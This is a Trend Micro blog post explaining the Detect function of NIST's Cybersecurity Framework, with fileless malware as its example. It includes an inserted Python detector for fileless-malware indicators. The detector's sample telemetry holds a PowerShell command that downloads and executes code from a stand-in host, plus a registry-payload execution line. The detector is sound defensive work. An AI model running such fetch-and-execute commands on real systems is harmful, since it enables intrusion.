
NIST Cybersecurity Framework Series Part 3: Detect

  • Posted on: March 28, 2018
  • Posted in: Industry News, Security
  • Posted by: Trend Micro
Detect is the third function in NIST's Cybersecurity Framework.

Enterprise chief information security officers have their work cut out for them in the current threat landscape. As attack and infection strategies become more complex and difficult to predict, the business’s CISO must ensure that the organization’s most critical information assets and the systems that support them are secure.

In order to create more cohesive and universal standards of protection, the National Institute of Standards and Technology established its Framework for Improving Critical Infrastructure Cybersecurity. This framework includes five key functions and associated categories for CISOs and their stakeholders to follow.

In Part 1 and Part 2 of this series, we examined the first two functions, Identify and Protect. Today, we’ll take a closer look at Detect, the third function in the framework, and at the responsibilities CISOs have under this step of the NIST Cybersecurity Framework.

Detect: NIST definition

The first two functions of the framework encompass establishing adequate understanding of the current infrastructure as well as the risks that can impact these systems. From here, CISOs should put the necessary protections in place to support the continuous delivery of critical services.

As Compass IT Compliance contributor Geoff Yeagley noted, the Identify function can be thought of as the foundation, with the Protect function serving as the framing.

“Once you have your house built, you need to put some items in your house to alert you to any pending danger or threats,” Yeagley wrote. “These could be things like smoke detectors, carbon monoxide detectors and home alarm systems. Using that same analogy of building a house this would be the Detect function of the core.”

NIST defines the Detect function as the development and implementation of activities “to identify the occurrence of a cybersecurity event,” with a focus on supporting the timely discovery of such events.

Categories under Detect

As many experts including Yeagley note, this function is relatively straightforward. While this surely does not make it any less important than the other functions of the framework, this function does include fewer associated categories. Let’s take a look:

  • Anomalies and events: CISOs and their teams should be able to detect anomalous activity, meaning activity that is or could be associated with a cybersecurity incident, and do so in a timely manner. They must also understand the potential impact of that activity and establish incident alert thresholds.
  • Continuous monitoring: This category calls for continuous, end-to-end monitoring of IT systems and assets in order to pinpoint security issues and verify the effectiveness of the safeguards put in place under the Protect function. The network, physical environments, and user and service-provider activity should all be monitored, and vulnerability scans should be performed on protected systems.
  • Detection processes: Here, CISOs and their stakeholders maintain the processes and procedures for detecting anomalous activity and protecting against cybersecurity events. This includes defining the roles and responsibilities involved in detection, ensuring that detection activities meet applicable compliance requirements, and making sure they are fully tested and continually improved.

It’s important to keep in mind that the goal is not only to detect the kind of suspicious activity that could point to an infection or attack, but to do so in a timely manner. Currently, hackers are able to fly under the radar for over 100 days before being detected, with some events lasting over 400 days. This gives attackers plenty of time to infect siloed areas of the business and make off with stolen data assets. For this reason, it’s imperative that CISOs give the Detect function, and its focus on timeliness, the appropriate attention and effort.

Detection in the real world: Fileless malware

In today’s threat environment, the ability to quickly detect suspicious activity is absolutely key. A recent example that shows this critical importance comes in the form of fileless malware, which has been put to work in ransomware and a range of other types of attacks.

Trend Micro reported on fileless malware in 2017, explaining that, like other attacks, fileless malware looks to take advantage of system vulnerabilities, but is created with another express purpose: to operate in the background and remain undetectable to system security measures. In this way, hackers are able to draw out the length of the attack and potentially breach and steal increasingly sensitive platforms and data assets.

“Current security solutions detect an intrusion based on a malware file’s signature characteristics,” Trend Micro stated in its Simply Security blog. “However, because fileless malware doesn’t have a payload file to infect a system, security applications don’t know what to look for. In addition, this threat uses a system’s own commands to execute the attack, which might not be considered in traffic and behavior monitoring efforts.”

One of the most notable campaigns leveraging fileless malware impacted more than 100 banks and financial service providers across the globe – in one instance, the infection was only discovered when a bank’s security team investigated the physical memory of their Microsoft domain controller. In addition to internal banking systems, hackers also unleashed the fileless malware attack on eight Russian ATMs, allowing attackers to take control of the machines’ capabilities and steal more than $800,000.

Detection lessons of fileless malware

One of the biggest lessons taught by fileless malware is that an attack no longer requires a malicious file to be written to or downloaded onto the local disk and then executed as a payload. Attackers can instead target system memory or the registry, injecting the payload there, or run scripts inside a whitelisted application. In the latter case, hackers exploit the legitimacy of tools like PowerShell, which is built on the .NET Framework, because of its scope, accessibility and ability to reach a wide range of APIs.
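The detection logic these lessons and the “anomalies and events” category above point to, as an added example that is not part of the original post: a small Python detector that decodes PowerShell -EncodedCommand arguments, tags in-memory execution and registry-stored payload indicators in process command-line records, and raises a per-host alert only when the number of distinct indicators seen within a time window reaches an alert threshold. The event records, host names, indicator list and threshold values are constructed for illustration and are not Trend Micro telemetry or rules.

```python
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Constructed heuristics for in-memory execution and registry-stored payloads (fileless tradecraft).
INDICATORS = [
    (r"invoke-expression|\biex\b", "inline-execution"),
    (r"downloadstring|downloaddata|invoke-webrequest", "remote-fetch"),
    (r"hkcu:|hklm:|get-itemproperty", "registry-payload"),
]
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)

def normalize(cmdline):
    """Append the decoded -EncodedCommand (UTF-16LE base64) so indicators hidden inside it are visible."""
    m = ENC_FLAG.search(cmdline)
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16-le", "ignore") if m else cmdline
    except ValueError:  # malformed base64: keep the raw command line for matching
        return cmdline

def score_event(cmdline):
    text = normalize(cmdline).lower()
    return [tag for pat, tag in INDICATORS if re.search(pat, text)]

def detect(events, threshold=2, window=timedelta(minutes=10)):
    """Alert per host when the distinct indicators seen within `window` reach `threshold` (the alert threshold)."""
    hits = defaultdict(list)
    for ev in events:
        for tag in score_event(ev["cmdline"]):
            hits[ev["host"]].append((datetime.fromisoformat(ev["ts"]), tag))
    alerts = {}
    for host, items in hits.items():
        items.sort()
        for t0, _ in items:  # slide the window from each hit; first window over threshold alerts
            seen = {tag for t, tag in items if t0 <= t <= t0 + window}
            if len(seen) >= threshold:
                alerts[host] = sorted(seen)
                break
    return alerts

# Constructed sample telemetry, not real logs; the encoded command is built here so it stays readable.
ENC = base64.b64encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ts": "2018-03-28T09:00:00", "host": "dc01", "cmdline": "powershell.exe -NoP -W Hidden -Enc " + ENC},
    {"ts": "2018-03-28T09:04:00", "host": "dc01", "cmdline": "powershell.exe -c \"iex (Get-ItemProperty 'HKCU:\\Software\\Demo').Blob\""},
    {"ts": "2018-03-28T09:05:00", "host": "ws17", "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

def run_sample():
    return detect(SAMPLE_EVENTS)  # {'dc01': ['inline-execution', 'registry-payload', 'remote-fetch']}
```

The benign scheduled script on ws17 produces no indicators, while dc01 crosses the threshold inside one window; raising the threshold or shrinking the window is how the alert sensitivity the Detect function asks for is tuned.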

CISOs: Leverage a proactive Detect strategy

Guarding against advanced threats like fileless malware is difficult but not impossible. It does, however, require a proactive approach that is used alongside, and aligned with, the standards of the Detect function. As Trend Micro Researcher Marvin Cruz noted, proactive security should include measures like:

  • A robust patch strategy that works to ensure all critical systems and applications are up to date.
  • User-based privileges that help reduce risk exposure.
  • Advanced behavior monitoring that can assist in pinpointing anomalous activity.
  • Robust security for all points of entry.
  • Elimination and disabling of unnecessary or unused components and tools.
  • Proactive system- and network-wide monitoring.

“We are in a global cyber arms race,” said Ed Cabrera, Trend Micro Chief Cybersecurity Officer. “The explosive growth of criminal innovation and automation requires an in-kind response from CISOs and their teams. Speeding up quality detection through a layered connected threat defense is paramount.”

Through the intelligent identification of risks, the implementation of security measures that keep critical functions running, and the timely detection of threats, enterprises can considerably improve the protection of their most critical IT assets. But efforts shouldn’t stop here: check in later for the next parts of our series, where we’ll discuss the Respond and Recover functions.

